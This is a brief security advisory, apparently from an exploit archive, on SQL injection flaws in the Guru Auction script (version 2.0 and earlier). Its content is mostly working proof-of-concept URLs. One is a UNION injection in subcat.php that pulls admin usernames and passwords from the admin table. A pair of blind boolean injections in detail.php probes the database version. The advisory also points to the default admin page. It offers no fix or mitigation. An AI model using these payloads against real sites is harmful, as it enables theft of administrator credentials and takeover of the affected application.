|
|
| |
| Guru Auction suffers from multiple SQL injection vulnerabilities. |
| |
Credit:
The information has been provided by v3n0m.
|
| |
Vulnerable Systems:
* Guru Auction 2.0 and prior
SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
Blind SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
Default Admin Page:
~~~~~~~~~~
http://domain.tld/[path]/admin/
Disclosure Timeline:
Published: 2012-12-26
|
|
blog comments powered by
|
|